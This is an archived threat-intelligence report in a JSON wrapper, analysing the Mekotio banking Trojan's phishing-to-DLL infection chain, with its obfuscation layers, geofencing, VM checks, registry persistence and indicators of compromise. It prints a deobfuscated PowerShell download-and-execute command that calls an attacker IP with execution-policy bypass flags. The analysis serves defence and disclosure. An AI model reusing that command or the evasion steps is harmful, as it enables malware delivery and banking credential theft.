{
	"id": "a1fe0ea4-1739-401c-b1c6-57f6253b192a",
	"created_at": "2026-04-06T00:08:03.156691Z",
	"updated_at": "2026-04-10T03:20:03.939945Z",
	"deleted_at": null,
	"sha1_hash": "8f53d13fac3a3576772ea5885ca7b6bf69228a73",
	"title": "Mekotio Banker Returns with Improved Stealth and Ancient Encryption",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 71846,
	"plain_text": "Mekotio Banker Returns with Improved Stealth and Ancient Encryption\r\nBy etal\r\nPublished: 2021-11-03 · Archived: 2026-04-05 21:39:40 UTC\r\nResearch by: Arie Olshtein \u0026 Abedalla Hadra\r\nA banking Trojan called “Mekotio”, which targeted Latin American countries in the past, is now making a comeback with a change in its infection flow.\r\nCheck Point Research (CPR) detected over 100 attacks in recent weeks using the Trojan’s new technique.\r\nThe infection starts with, and is distributed by, a phishing email containing a link to a zip archive or a zip file as an attachment.\r\nOne of the main characteristics of those bankers, such as Mekotio, is the modular attack, which gives the attackers the ability to change only a small part of the whole in order to avoid detection.\r\nIntroduction\r\nMekotio, a modular banking Trojan that targeted Latin American countries, recently made a comeback with a new infection flow. The new campaign started right after the Spanish Civil Guard announced the arrest of 16 people involved with Mekotio distribution in July 2021. It appears that the gang behind the malware was able to narrow the gap quickly and change tactics to avoid detection.\r\nWe assume that the main cybercrime groups are operating from Brazil and that they collaborated with Spanish gangs to distribute malware. The arrest stopped the activity of the Spanish gangs but not the main cybercrime groups.\r\nMekotio’s new infection vector contains these unprecedented elements:\r\nA stealthier batch file with at least two layers of obfuscation.\r\nA new fileless PowerShell script that runs directly in memory.\r\nUse of Themida v3 for packing the final DLL payload.\r\nIn the last 3 months, we saw approximately 100 attacks that use new, simple obfuscation techniques, with the help of a substitution cipher, to hide the first module of the attack. This simple obfuscation technique allows it to go undetected by most antivirus products.\r\nhttps://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/\r\nPage 1 of 11\n\nFigure 1 – Low detection rate of Mekotio batch file on VirusTotal\r\nDuring July and August, the Check Point Threat Prevention Engine detected and blocked a wave of malicious batch files with unique obfuscation patterns. When we looked into it, we saw the following attack flow:\r\nAttack flow\r\nFigure 2 – Mekotio new attack flow\r\n1. The infection starts with a phishing email containing a link to a zip archive or a zip file as an attachment. The message lures the victim to download and extract the zip content.\r\n2. When the user clicks on the zip content, the batch script is executed.\r\n3. The batch script runs a “PowerShell Download Cradle”, which downloads a PowerShell script and runs it in memory.\r\n4. The PowerShell script:\r\nChecks if the target is located in Latin America.\r\nMakes sure it is not running in a virtual machine.\r\nSets up persistence in the victim’s operating system.\r\nDownloads a secondary zip archive.\r\n5. The secondary zip archive contains three files:\r\n1. AutoHotkey (AHK) interpreter (AutoHotkey is a free, open-source scripting language for Windows that allows users to easily create small to complex scripts for all kinds of tasks).\r\n2. Mekotio DLL, usually packed with Themida v3.\r\n3. AutoHotkey script.\r\n6. Those 3 files are extracted and saved in a new directory on the infected system.\r\n7. The PowerShell script calls the AutoHotkey interpreter to run the AHK script.\r\n8. The AutoHotkey script runs the DLL payload.\r\n9. The DLL contains the main Mekotio banker functionality, such as stealing access credentials for electronic banking portals and stealing passwords.\r\n10. The stolen data is sent to the C\u0026C server.\r\nLet’s now take a closer look at the malware components.\r\nPhishing email\r\nThe phishing email, which is written in Spanish, claims that there is a digital tax receipt pending submission. When the victims click the link in the email, a malicious zip archive is downloaded from a malicious website.\r\nFigure 3 – Phishing email\r\nBatch file\r\nThe batch file extracted from the first zip archive has two layers of obfuscation and often has a file name that starts with “Contacto”.\r\nFigure 4 – Snippet of the obfuscated batch script\r\nThe first layer of the obfuscation is a simple substitution cipher. Substitution ciphers encrypt plaintext by replacing each symbol in the plaintext with the corresponding symbol from a lookup table. The source code of this obfuscation was probably taken from here.\r\nEach batch file contains these two lines:\r\nFigure 5 – Substitution arrays\r\nThese lines define the substitution, and we can use them to deobfuscate the first layer.\r\nAfter deobfuscating the first layer, we get another layer of obfuscation:\r\nFigure 6 – Layer 2 of obfuscation\r\nIn this layer, slices of the command are saved in different environment variables. The values in lines 4-13 are concatenated, resulting in the following command:\r\npowershell.exe -ep bypass -nop -win 1\r\nThere is also a PowerShell command saved in an environment variable (called “mEeWtg9Pxm” in the example, line 18), which is produced by concatenating letters from the environment variable called “o7cro6vX” in the example (line 3).\r\nThe output of executing lines 3 and 18 is the following PowerShell command:\r\nPutting everything together, the batch file executes the following command:\r\necho iex(\"IEX(New-Object Net.WebClient).DownloadString('http://13[.]66.15.167/m/?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT')\"); | powershell.exe -ep bypass -nop -win 1\r\nAfter executing the command, a PowerShell script is downloaded into memory and executed.\r\nPowerShell script\r\nThe first thing the script does is check the location of the infected system using the ipinfo.io service. If the system is not in one of these countries (Brazil, Chile, Mexico, Spain and Peru), the attack is terminated.\r\nFigure 7 – Checking the location of the infected system\r\nNext, the script checks if it is running in a virtual machine: it compares the computer model to the strings ‘VMware Virtual Platform’ and ‘Virtual Machine’, and exits if the computer model is one of the above.\r\nFigure 8 – Checking if the computer is a virtual machine\r\nThe next thing the script does is create an empty file, used as a footprint, whose name is the current date. This lets it know if it already ran on the system. If the file already exists, the script stops execution.\r\nFigure 9 – Footprint file creation\r\nAfter checking the footprint file, a directory with a random 8-character name is usually created in the ProgramData directory.\r\nFigure 10 – Creating a new directory\r\nNext, a secondary zip file with a random file name is downloaded to the directory.\r\nFigure 11 – Downloading the zip file\r\nThe downloaded zip archive contains three files: the Mekotio payload DLL, the AutoHotkey interpreter and the AutoHotkey script. After downloading the zip archive, the script extracts each file, renames it with a random name and saves it in the created directory.\r\nThe script checks the size of the extracted files to distinguish between the type and the purpose of the files. The script then renames the files, adding the extension according to the detected file type.\r\nFigure 12 – Renaming files from the downloaded zip\r\nAfter renaming the extracted files, a shortcut to the AutoHotkey interpreter is created in the AppData directory. The arguments to the shortcut are the AutoHotkey script and the Mekotio DLL.\r\nAn AutoHotkey process is started using the shortcut.\r\nFigure 13 – Creating the shortcut and starting AutoHotkey process\r\nFinally, persistence is gained by adding a new value to the following registry key:\r\n“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run”\r\nThis runs AutoHotkey with the AHK script and the Mekotio DLL as arguments.\r\nFigure 14 – Adding a new value to the registry\r\nThe AHK script uses DllCall to run the 4th exported DLL function. Because it is loaded by the AutoHotkey script, the DLL looks like part of the AutoHotkey execution. The final payload is the DLL, which contains the well-known and well-documented Mekotio banker.\r\nConclusion\r\nBanking Trojans are common malware used in attacks targeting countries in Latin America.\r\nOne of the characteristics of those bankers, such as Mekotio, is the modular attack, which gives the attackers the ability to change only a small part of the whole in order to avoid detection.\r\nCPR sees a lot of old malicious code that has been used for a long time, and yet the attacks manage to stay under the radar of AV and EDR solutions by changing packers or obfuscation techniques, such as a substitution cipher.\r\nOur analysis of this campaign highlights the efforts that attackers make to conceal their malicious intentions, bypass security filtering and trick users. To protect yourself against this type of attack, be suspicious of any email or communication from a familiar brand or organization that asks you to click on a link or open an attached document.\r\nHere are some practical tips to help keep your data safe:\r\n1. Beware of lookalike domains, spelling errors in emails or websites, and unfamiliar email senders.\r\n2. Be cautious with files received via email from unknown senders, especially if they prompt for a certain action you would not usually do.\r\n3. Make sure you are ordering goods from an authentic source. One way to do this is to NOT click on promotional links in emails, and instead, Google your desired retailer and click the link from the Google results page.\r\n4. Beware of “special” offers that don’t appear to be reliable or trustworthy purchase opportunities.\r\n5. Make sure you do not reuse passwords between different applications and accounts.\r\nOrganizations can prevent zero-day attacks with an end-to-end cyber architecture used to block deceptive phishing sites and provide alerts on password reuse in real time. Check Point Infinity is effective because it combines two key ingredients: full convergence across all attack surfaces and all attack vectors, and advanced prevention that can tackle the most sophisticated zero-day phishing and account takeover attacks.\r\nCheck Point Threat Emulation provides protection against this threat:\r\nWin.PSBypass.A\r\nWins.obfusBat.A\r\nIndicators of Compromise\r\nBatch SHA1\r\n09a536c2260d01fe9de33b905cde75685360cd3d\r\n106a719cecf90db98fb3a79bf22435acafcf6e4f\r\n134b1b4e2726117b0bf5ac7670f37e10f40ccc31\r\n24965ac9150a86085aa36b953ef3b181ef2007b5\r\n40ce61f375fbebf809bf55f7dba93c890ac990ac\r\n412c522f180d6d773b892e92e45c72780a9f491c\r\n4178e160fdff914718b55ded12808189939453bb\r\n561bff9aa9c807b937b460ef3d2cf0f710ff3eb5\r\n5a9d4e41d677d0caadf232b7cdcfe51cde38ed77\r\n5bc7099f709e1ae1ac0354fa99a32703e6306a6d\r\n87cbb5e4bae97f51e22668634ebc764e6a863a68\r\n87d9f2c95835a1ad9c2397d0f776eb8f2e08125c\r\nc3b93e8d68614447f462d001b7a44ccc7c3c9e52\r\nc7b3f093a320ffd2b9667c79622a42d88e2b68ac\r\nd1404272a3d23b143fc9fec377577cab715d9838\r\nd884cd7ac1664d1227214fe21e6ef7f657fa69a5\r\ndfde9908dc5395f9dfb4b9dae00f4a3fb555af5c\r\nfc24562b2efc77dc6174abf592fe68051751b678\r\nLinks to first zip\r\n20.206.121[.]1/arquivo.php\r\n40.90.192[.]58/factura0001450000g9.zip\r\nlianzafacture[.]eu/75rg6ty7.php?e=desktop-pc\r\nonflicitoesar[.]eu/75rg6ty7.php?e=desktop-pc\r\nontabilidadms[.]eu/75rg6ty7.php?e=desktop-pc\r\nc2-3-143-67-171.us-east-2.compute.amazonaws[.]com/arquivo.php\r\ntaingenieria[.]eu/75rg6ty7.php?e=desktop-pc\r\nerdfacturaa[.]top/arquivo.php\r\ndfcompros[.]com/arquivo.php\r\nemg-compl[.]com/75rg6ty7.php?e=desktop-pc\r\npyddteres[.]hopto.org/75rg6ty7.php?e=desktop-pc\r\nubbencion[.]australiaeast.cloudapp.azure[.]com/75rg6ty7.php?e=desktop-pc\r\nubbencion[.]eu/75rg6ty7.php?e=desktop-pc\r\nSource: https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/"
	],
	"report_names": [
		"mekotio-banker-returns-with-improved-stealth-and-ancient-encryption"
	],
	"threat_actors": [],
	"ts_created_at": 1775434083,
	"ts_updated_at": 1775791203,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8f53d13fac3a3576772ea5885ca7b6bf69228a73.pdf",
		"text": "https://archive.orkl.eu/8f53d13fac3a3576772ea5885ca7b6bf69228a73.txt",
		"img": "https://archive.orkl.eu/8f53d13fac3a3576772ea5885ca7b6bf69228a73.jpg"
	}
}